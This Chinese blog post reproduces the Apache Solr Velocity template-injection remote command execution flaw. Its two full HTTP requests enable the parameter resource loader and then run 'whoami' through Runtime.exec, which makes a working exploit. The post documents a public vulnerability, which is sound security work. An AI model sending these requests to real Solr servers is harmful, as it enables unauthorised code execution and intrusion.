Apache Solr Velocity 远程命令执行漏洞

最新推荐文章于 2024-05-12 14:14:04 发布
最新推荐文章于 2024-05-12 14:14:04 发布
阅读量447 收藏 1
点赞数
文章标签: Aapache Solr Velocity 远程命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44276628/article/details/102841729
版权

目录

漏洞背景

近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞,可进行远程代码执行。

漏洞成因

Apache-Solr默认集成VelocityResponseWriter插件,该插件初始化参数中的 params.resource.loader.enabled 用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是 false。攻击者通过POST请求直接将params.resource.loader.enabled修改为true。经过精心构造代码发送GET请求造成远程代码执行漏洞

影响版本

影响Apache Solr多个版本,包括最新版 8.2.0

漏洞复现

获取core名称

首先需要获取solr服务中的core名称,才可以执行攻击,可以从logging和core admin中获取
在这里插入图片描述
在这里插入图片描述

加载指定资源

通过POST请求把params.resource.loader.enabled设置为True,此时用户就可以加载指定资源,也就是构造一个能执行命令的恶意请求。
在这里插入图片描述

POST /solr/core名称/config HTTP/1.1
Host: ip:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://ip/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

远程命令执行

精心构造恶意代码,通过GET请求就可以远程执行命令了
在这里插入图片描述

GET /solr/core名称/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: ip:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://ip/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 0

修复建议

目前,官方尚未发布相关漏洞的安全补丁,请及时关注官方更新
官网链接

参考链接

https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template
https://nosec.org/home/detail/3113.html

Chris..
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现Apache Solr Velocity远程代码执行
AmyBaby00的博客
10-31 453
本文为学习笔记,仅限学习交流 不得利用、从事危害国家或人民安全、荣誉和利益等活动 请参阅《中华人民共和国网络安全法》 本文转载于:https://qiita.com/shimizukawasaki/items/a5a9d951e5d1a7c1cfef [进攻复现] Apache Solr Velocity模板远程代码执行 近日,国外安全专家s00py公开了一个Apache Solr的Velocit...
Apache Solr Velocity模版注入远程命令执行漏洞
weixin_42372877的博客
11-01 539
0x01漏洞概述 2019年10月末,GitHub代码中安全研究员S00pY发布一个Apache Solr Velocity模版注入远程命令执行的POC,发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core...
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
weixin_44047654的博客
02-20 1024
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)
最新发布
网络安全领域___专研者.
05-12 836
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
Apache Solr Velocity模板远程代码执行——kali搭建漏洞复现
Stephen Wolf
10-31 328
Apache Solr Velocity模板远程代码执行 漏洞描述 近日,国外安全研究员s00py公开了一个Apache SolrVelocity模板注入的漏洞.该漏洞可以攻击最新版本的Solr.目前该漏洞利用详情已经广泛流传于Github以及各大安全群,且公开的EXP可以执行任意命令并自带回显.官方暂未发布补丁. CVE编号 ...
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
Apache Solr初级教程.docx
09-22
Apache Solr 是一款基于开源全文检索库 Apache Lucene 的企业级搜索服务器。它以其高度可扩展性和丰富的功能,被广泛应用于构建高效的搜索引擎。Solr 使用 Java 编写,但通过HTTP和XML接口与外界交互,使得即使不...
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE ...CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 Apache Solr 未授权上传
Apache Solr组件安全概览1
08-03
近年来,Apache Solr曝出过多个高危漏洞,包括但不限于任意文件读取、远程代码执行等。这些漏洞可能被攻击者利用,影响系统的稳定性和数据安全性。文章末尾提到的一个全版本任意文件读取漏洞,官方拒绝修复,用户需...
Apache Solr Velocity模板远程代码执行漏洞复现
weixin_44253823的博客
10-31 621
下载漏洞环境https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip 解压以后,进入solr-8.1.0/bin目录 使用./solr -e dih -force开启漏洞环境 访问http://youip:8983/solr/#/进入主界面 点击左侧的Core Selector查看集合名称,可以...
solr 远程命令执行 (CVE-2019-17558)
m0_49025459的博客
12-06 486
漏洞描述 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。 影响范围 Apache Solr 5.0.0 ~8.3.1 漏洞利用 (1)默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。可以先通过如下API获取所有的核心在vulhub中核心就是demo通过下边API获取所有内核名称 第一步:访问特定url启用配置par
Apache Solr 远程命令执行
m0_63241485的博客
08-28 919
命令执行漏洞
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2024-17558)
2401_83974173的博客
04-13 541
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
漏洞预警】Apache Solr基于Velocity模板的远程命令执行漏洞
NOSEC2019的博客
10-31 1031
2019年10月末,白帽汇安全研究院发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程...
Apache Solr Velocity远程命令执行漏洞(CVE-2019-17558)
whojoe的博客
07-06 1285
Apache Solr Velocity远程命令执行漏洞(CVE-2019-17558)前言环境搭建漏洞复现参考文章 前言 影响Apache Solr 8.1.1到8.2.0版本 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2019-17558/ 启动容器 docker
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值